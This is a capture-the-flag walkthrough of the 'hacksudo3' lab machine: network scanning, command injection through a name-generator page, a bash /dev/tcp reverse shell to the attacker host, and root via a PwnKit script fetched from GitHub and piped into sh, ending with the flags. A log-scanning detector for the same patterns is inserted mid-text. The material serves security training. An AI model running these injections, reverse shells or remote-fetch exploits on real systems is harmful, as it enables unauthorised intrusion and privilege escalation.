First, the network is scanned with arp-scan to determine the target's IP address.
ARP scan
192.168.2.131 08:00:27:11:3f:08 PCS Systemtechnik GmbH
Next, the /etc/hosts file is edited to map the hostname hacksudo3.vln to the IP address.
/etc/hosts
192.168.2.131 hacksudo3.vln
Nmap is used to scan the target system for open ports and services. The -Pn option skips host discovery in case ICMP is blocked. The output is then filtered to show only the open ports.
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
Nmap is run again to obtain more detailed information.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:28 CEST
Nmap scan report for hacksudo3.vln (192.168.2.131)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Link Lock - Password-protect links
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:11:3F:08 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.13 ms hacksudo3.vln (192.168.2.131)
Nikto is used to scan the web server for vulnerabilities.
- Nikto v2.5.0
+ Target IP: 192.168.2.131
+ Target Hostname: 192.168.2.131
+ Target Port: 80
+ Start Time: 2024-09-19 22:28:51 (GMT2)
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 8de, size: 5bddff0c01c87, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /hidden/: This might be interesting.
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /login.php: Admin login page/section found.
+ 8103 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-09-19 22:29:02 (GMT2) (11 seconds)
+ 1 host(s) tested
Gobuster is used to discover further directories and files.
http://192.168.2.131/index.html (Status: 200) [Size: 2270]
http://192.168.2.131/login.php (Status: 200) [Size: 497]
http://192.168.2.131/info.php (Status: 200) [Size: 83308]
http://192.168.2.131/create (Status: 301) [Size: 315] [--> http://192.168.2.131/create/]
http://192.168.2.131/favicon.svg (Status: 200) [Size: 3269]
http://192.168.2.131/LICENSE (Status: 200) [Size: 1069]
http://192.168.2.131/generator.php (Status: 200) [Size: 647]
http://192.168.2.131/hidden (Status: 301) [Size: 315] [--> http://192.168.2.131/hidden/]
http://192.168.2.131/decrypt (Status: 301) [Size: 316] [--> http://192.168.2.131/decrypt/]
The JavaScript file /api.js is analysed to see how the password is turned into the encryption key.
view-source:http://192.168.2.131/api.js
    // Import the raw, plain-text password and derive a key using a SHA-256 hash
    // and PBKDF2. Use the static salt for this version if one has not been given
    deriveKey: async function(password, salt=null) {
        // The password bytes become the PBKDF2 input key material
        let rawKey = await window.crypto.subtle.importKey(
            "raw",
            b64.asciiToBinary(password),
            { name: "PBKDF2" },
            false,
            [ "deriveBits", "deriveKey" ]
        );
        // PBKDF2-HMAC-SHA256 with 100000 iterations yields a 256-bit AES-GCM key;
        // without an explicit salt the application's static salt is used
        return await window.crypto.subtle.deriveKey(
            {
                name: "PBKDF2",
                salt: salt === null ? this.salt : salt,
                iterations: 100000,
                hash: "SHA-256"
            },
            rawKey,
            {
                name: "AES-GCM",
                length: 256
            },
            true,
            [ "encrypt", "decrypt" ]
        );
    },
On the login page, a reference to a private website is found.
view-source:http://192.168.2.131/login.php
Login
Authorized login to see HACKSUDO private conten.
The information on the /create/ page is analysed.
http://192.168.2.131/create/
View on GitHub
hacksudo Link Lock
Link Lock is a tool for adding a password to a link; in other words, for encrypting and decrypting URLs. When a user visits an encrypted URL, they will be prompted for a password. If the password is correct, Link Lock sends them to the hidden website. Otherwise, an error is displayed. Users can also add hints to remind them of the password.
Each encrypted URL is stored entirely within the link generated by this application. As a result, users control all the data they create with Link Lock. Nothing is ever stored on a server, and there are no cookies, tracking, or signups. View on GitHub for more information, including translated versions.
ABOUT US: this hacksudo locker Box Author is viluhacker for for info about Mr.vishal waghmare visit instagram.com @ realvilu Box managed By admin monali
Link Lock has many uses, for example:
Store private bookmarks on a shared computer - Password: avocado
Add a password to shared Dropbox or Google Drive links
Implement simple CAPTCHAs
Encrypt entire pages (via URL Pages) - Password: urlpage5
Post private links on public websites
Share password-protected torrents and magnet links - Password: torrenting_is-legal!
secret link
hint (optional)
password
confirm password
output
Copied
Box Created by Vishal Waghmare | hacksudo.com.
Blog leetvilu.
An attempt is made to use the payload generator to execute commands.
http://192.168.2.131/generator.php#
Payload
$(id)
Payload
⛔ Enter Your Name below: ⛔
www.hacksudo.com
[figlet-style ASCII banner: the generator renders the output of the injected id command, uid=33(www-data) gid=33(www-data) groups=33(www-data)]
😀 HACKSUDO Locker: fancy name generator
💗 Smart People Alway execute Smart Plan
⛔ Enter Your Name below: ⛔
www.hacksudo.com
[figlet-style ASCII banner: the generator renders /etc/passwd entries (root and hacksudo) returned by another injected command]
$(cat /var/www/html/info.php)
$(cat /var/www/html/generator.php)
generator
😀 HACKSUDO Locker: fancy name generator
💗 Smart People Alway execute Smart Plan
⛔ Enter Your Name below: ⛔
www.hacksudo.com
An attempt is made to obtain a reverse shell via the file inclusion vulnerability.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
192.168.2.131/shell.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
listening on [any] 5555 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.131] 47210
bash: cannot set terminal process group (744): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$
A reverse shell is received.
SUID files are searched for.
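As an added example from the detection side (not part of the walkthrough), a small scanner over Apache access-log lines that decodes each query string and flags the command-substitution and reverse-shell patterns used against generator.php and shell.php above. The log lines are constructed; the generator.php entry assumes the name field is sent as a GET parameter, which the walkthrough does not state.

```javascript
// Added example: flag web requests carrying shell command substitution or a
// reverse-shell pattern in the query string. Log lines are constructed samples.
const SAMPLE_LOG = [
  '192.168.2.199 - - [19/Sep/2024:22:35:10 +0200] "GET /create/ HTTP/1.1" 200 2270 "-" "Mozilla/5.0"',
  '192.168.2.199 - - [19/Sep/2024:22:36:42 +0200] "GET /generator.php?name=%24%28id%29 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
  '192.168.2.199 - - [19/Sep/2024:22:41:03 +0200] "GET /shell.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27 HTTP/1.1" 200 0 "-" "curl/8.0"',
  '192.168.2.50 - - [19/Sep/2024:22:42:00 +0200] "GET /login.php HTTP/1.1" 200 497 "-" "Mozilla/5.0"',
];

// Indicator name -> test applied to the percent-decoded query string.
const INDICATORS = {
  command_substitution: q => /\$\(|`/.test(q),          // $(...) or backticks
  shell_invocation: q => /\b(?:ba)?sh\s+-[ic]\b/.test(q), // sh -c / bash -i
  dev_tcp_reverse_shell: q => /\/dev\/tcp\//.test(q),    // bash network redirection
  shell_metachar: q => /[;|&]/.test(q),                  // chaining / redirection
  raw_cmd_parameter: q => /(^|[?&])cmd=/.test(q),        // webshell-style parameter
};

// Parse a combined-format line into its fields; null if the line does not match.
function parseLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/);
  if (!m) return null;
  const target = m[4];
  const i = target.indexOf("?");
  const path = i < 0 ? target : target.slice(0, i);
  const rawQuery = i < 0 ? "" : target.slice(i + 1);
  let query;
  try { query = decodeURIComponent(rawQuery.replace(/\+/g, " ")); } catch { query = rawQuery; }
  return { client: m[1], time: m[2], method: m[3], path, query, status: Number(m[5]) };
}

// Names of the indicators one log line triggers (empty for benign requests).
function suspiciousIndicators(line) {
  const req = parseLine(line);
  if (!req) return [];
  return Object.keys(INDICATORS).filter(name => INDICATORS[name](req.query));
}

// Reduce a whole log to the flagged requests: client, path and matched indicators.
function scanLog(lines) {
  return lines
    .map(line => ({ req: parseLine(line), hits: suspiciousIndicators(line) }))
    .filter(r => r.req && r.hits.length > 0)
    .map(r => ({ client: r.req.client, path: r.req.path, hits: r.hits }));
}
```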
www-data@hacksudo:/var/www/html$ find / -type f -perm -4000 -ls 2>/dev/null
886 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
688 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
1182 40 -rwsr-xr-x 1 root root 39296 Aug 30 2020 /usr/bin/umount
907 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
8121 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
853 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
577 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
839 56 -rwsr-xr-x 1 root root 55680 Aug 30 2020 /usr/bin/mount
1112 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
583 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
510 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
706 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
902 76 -rwsr-xr-x 1 root root 76744 Aug 23 2020 /usr/bin/ping
9807 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
65 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1988/bin/ping
81 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1988/bin/su
99 27 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/1988/bin/umount
1726 75 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1988/usr/bin/chfn
1728 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1988/usr/bin/chsh
1781 75 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1988/usr/bin/gpasswd
1845 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1988/usr/bin/newgrp
1858 59 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1988/usr/bin/passwd
1949 146 -rwsr-xr-x 1 root root 149080 Jan 19 2021 /snap/core18/1988/usr/bin/sudo
2036 42 -rwsr-xr-- 1 root systemd-network 42992 Jun 11 2020 /snap/core18/1988/usr/lib/dbus-1.0/dbus-daemon-launch-helper
2346 427 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1988/usr/lib/openssh/ssh-keysign
Privilege escalation via pkexec (PwnKit)
www-data@hacksudo:/tmp$ pkexec --version
pkexec version 0.105
www-data@hacksudo:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@hacksudo:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@hacksudo:/tmp# cd ~
root@hacksudo: ls
proof.txt root.txt snap
root@hacksudo: cat root.txt
The root flag is displayed.
root@hacksudo: cat root.txt
7db64dc8077ff8f969938bc48bd0a9ab
The user flag is displayed.
root@hacksudo: ls /home/
hacksudo
root@hacksudo: cat /home/hacksudo/user.txt
d045e6f9feb79e94442213f9d008ac48
Privilege escalation successful